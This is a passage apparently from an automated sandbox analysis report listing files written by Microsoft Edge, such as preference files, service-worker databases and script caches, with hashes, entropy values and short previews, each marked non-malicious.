                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376570072277690","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3f7ee.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (16623), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16631
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.447596014397479
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stoJ99QTryDigabatSuypKsA4iaaFvrE9kfIYvdofbZKT6bPZPoYha8obV+F2CQL:stoPGKSu4KsA4VCDI4MFR+bG/Qw3a
                                                                                                                                                                                                                                                                                      MD5:513853D4439C1D901FA8ED86337EBA2A
                                                                                                                                                                                                                                                                                      SHA1:53DBDC954619FD909F37C6C62F4FD7EF1A9ED129
                                                                                                                                                                                                                                                                                      SHA-256:740B2169765CE4F50DD644E632C1585901D2E886516472F31FF72862571D7D96
                                                                                                                                                                                                                                                                                      SHA-512:52E0CA76BF67BF10452E308A003808A810167AAE85CDA06E5A76EA2885CB435B38CFF4B7442A5862E4D181FBE1B8422C5119045230E7098876882C6556DDB057
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376570072277690","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4415b.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (16623), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16631
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.447596014397479
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stoJ99QTryDigabatSuypKsA4iaaFvrE9kfIYvdofbZKT6bPZPoYha8obV+F2CQL:stoPGKSu4KsA4VCDI4MFR+bG/Qw3a
                                                                                                                                                                                                                                                                                      MD5:513853D4439C1D901FA8ED86337EBA2A
                                                                                                                                                                                                                                                                                      SHA1:53DBDC954619FD909F37C6C62F4FD7EF1A9ED129
                                                                                                                                                                                                                                                                                      SHA-256:740B2169765CE4F50DD644E632C1585901D2E886516472F31FF72862571D7D96
                                                                                                                                                                                                                                                                                      SHA-512:52E0CA76BF67BF10452E308A003808A810167AAE85CDA06E5A76EA2885CB435B38CFF4B7442A5862E4D181FBE1B8422C5119045230E7098876882C6556DDB057
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376570072277690","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):35286
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.557877490343028
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:7Lab3UWtVW5wtZf4Md8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPZ0Imrl6rwXHT3ZqU:7+jU+VWatZfRdu1jaO8R/3T34PtO
                                                                                                                                                                                                                                                                                      MD5:34C6C6C6894559A466FFBB2663E75937
                                                                                                                                                                                                                                                                                      SHA1:3E4C22C1963F2E6363D1746CC3911ED6E843F155
                                                                                                                                                                                                                                                                                      SHA-256:4EA1466CEE5677BB87516869D7315781BF84FF6DBF767E79F6421986690E41BE
                                                                                                                                                                                                                                                                                      SHA-512:DE7EDEE94D4EF6BF030EA76B1343F0C01B2FEF349B84BBCF16D52AAB7EE1F52359A5158A111CC94003EEEF08017696F8B74004750A912FEB046428E6FDF55354
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376570071621027","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376570071621027","location":5,"ma

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3f379.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):35286
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.557877490343028
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:7Lab3UWtVW5wtZf4Md8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPZ0Imrl6rwXHT3ZqU:7+jU+VWatZfRdu1jaO8R/3T34PtO
                                                                                                                                                                                                                                                                                      MD5:34C6C6C6894559A466FFBB2663E75937
                                                                                                                                                                                                                                                                                      SHA1:3E4C22C1963F2E6363D1746CC3911ED6E843F155
                                                                                                                                                                                                                                                                                      SHA-256:4EA1466CEE5677BB87516869D7315781BF84FF6DBF767E79F6421986690E41BE
                                                                                                                                                                                                                                                                                      SHA-512:DE7EDEE94D4EF6BF030EA76B1343F0C01B2FEF349B84BBCF16D52AAB7EE1F52359A5158A111CC94003EEEF08017696F8B74004750A912FEB046428E6FDF55354
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376570071621027","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376570071621027","location":5,"ma

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF41b93.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):35286
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.557877490343028
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:7Lab3UWtVW5wtZf4Md8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPZ0Imrl6rwXHT3ZqU:7+jU+VWatZfRdu1jaO8R/3T34PtO
                                                                                                                                                                                                                                                                                      MD5:34C6C6C6894559A466FFBB2663E75937
                                                                                                                                                                                                                                                                                      SHA1:3E4C22C1963F2E6363D1746CC3911ED6E843F155
                                                                                                                                                                                                                                                                                      SHA-256:4EA1466CEE5677BB87516869D7315781BF84FF6DBF767E79F6421986690E41BE
                                                                                                                                                                                                                                                                                      SHA-512:DE7EDEE94D4EF6BF030EA76B1343F0C01B2FEF349B84BBCF16D52AAB7EE1F52359A5158A111CC94003EEEF08017696F8B74004750A912FEB046428E6FDF55354
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376570071621027","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376570071621027","location":5,"ma

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2294
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.837648606816291
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:F2embatrdDhfBJAFXrdw6gh5rdDsBJAXvwrdfBJAM:F1mGtxDhsZxv85xDxXIxsM
                                                                                                                                                                                                                                                                                      MD5:7FC1CC8C62019422A82B60D9FF280667
                                                                                                                                                                                                                                                                                      SHA1:2DE6DBAF8A6B5D72546C3020D0A19023493E3338
                                                                                                                                                                                                                                                                                      SHA-256:6A2EEB249442CBA280C851F01ADADFEB54A4349D8C77B011968C826F2C506817
                                                                                                                                                                                                                                                                                      SHA-512:A5F32A32A3DC2844AA05D7086EF425CBAABEE762EFD15F835E1BDCE2F7BD9F73A33F39D34E3E098B918EA1313D6E9D12D1947A157BC92434473816A9FBE48185
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2...m................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true .(.0.8.....@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enable

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):303
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.114012156097132
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQ5ilq1N723oH+TcwtE/a252KLlVIQ5N4q2PN723oH+TcwtE/a2ZIFUv:oQ5ilaaYeb8xLQQ5N4vVaYeb8J2FUv
                                                                                                                                                                                                                                                                                      MD5:BDAC8DE3F9693340E10D80E47988EF7C
                                                                                                                                                                                                                                                                                      SHA1:37D8D318EA905CBD3A5B33FDC62B46D3A818A6D0
                                                                                                                                                                                                                                                                                      SHA-256:DBF88830DC366CF70EC386C0C941426289E5CE83835CA4121CD7C8BA6BE0BDC8
                                                                                                                                                                                                                                                                                      SHA-512:4E51C2DC29A0215A7AF1D8864E120CF04604FF4255D3201E2A62EA88F4C32A42B8FFE41BEBBA900BC6FDAD51E1901CF8FBE11109FC0951F93ACE353832CF9902
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:40.627 1f60 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/11/20-04:54:40.643 1f60 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):114179
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.578886768273735
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:AU906yxPXfOxr1lhCe1nL/rmL/rBZXECjAWNKZpckto1ui:d9LyxPXfOxr1lMe1nL/CL/TXEmaC0i
                                                                                                                                                                                                                                                                                      MD5:830E955DAEE924A68646F230B04F616D
                                                                                                                                                                                                                                                                                      SHA1:FE897B6B6DE286AB49E324865B282369ECD5FD24
                                                                                                                                                                                                                                                                                      SHA-256:764A18FB9ECBC36F0B1E888ECE0D4236B621E64C1A00A7EA11BFD98B8EE5D543
                                                                                                                                                                                                                                                                                      SHA-512:7BA37E2A79A51DE63DFF4433A8B02C17ADE92A473C055D7ADD1A9EDA037D713392BED947FC02FF970AF050AA22BDFF6761BABE4A63155F18F12B1ED758CCEDA5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):188665
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.384971915551876
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:k4qfrALKbhmYpJbwRutnagL/66MVQktwaXbEuG0:vj+bwmn5L/RqHhfz
                                                                                                                                                                                                                                                                                      MD5:B026C71A2A2AC57EF22A931B2689324D
                                                                                                                                                                                                                                                                                      SHA1:1ED13BBE6366D24EAAD2425FE0D73982EDA0DE74
                                                                                                                                                                                                                                                                                      SHA-256:EE5EEC451B81E948A17885ED19CB1767E5611FAC16EC0215CD4B52ED9BDCB0E2
                                                                                                                                                                                                                                                                                      SHA-512:74F80A806EDCDCCDB837E143528524F2FC0D09A4AD42120C53CBD2101FBDC84B71438B6D50C611BB356D7D0391F56EB149FA4E66A309CF9B310D4E62FD99E81A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:0\r..m..........rSG.....0...../...............R.......yT.........,T.8..`,.....L`.....,T...`......L`......Rcn[......exports...Rc........module....Rc...;....define....Rb.S_....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m..XVb...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....W...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):24
                                                                                                                                                                                                                                                                                      Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                      MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                      SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                      SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                      SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:0\r..m..................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.527150097341792
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:68SDK0QR0Xl/lUn/lxE0tllsKXwl:6lR0Ng
                                                                                                                                                                                                                                                                                      MD5:E87C26B11FDD1F445288A8EBF44840A1
                                                                                                                                                                                                                                                                                      SHA1:070551EBDE85CCA9B0EA8BCB9795BC44A530EDD4
                                                                                                                                                                                                                                                                                      SHA-256:BC4C30663F191F55977E6D02DF08E35128E31E7BB8BD3CF883E1BE05DAA177B3
                                                                                                                                                                                                                                                                                      SHA-512:C737472857D368986E1C0696ED7D7F59E85FEE53619B2EC40EDD402E853000FB489AA47D61E50A160D580FC4E82BFF828CDF3A5F290025375397FB746BD5BEAA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:@...O.7&oy retne.........................X....,................/|.l./.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):72
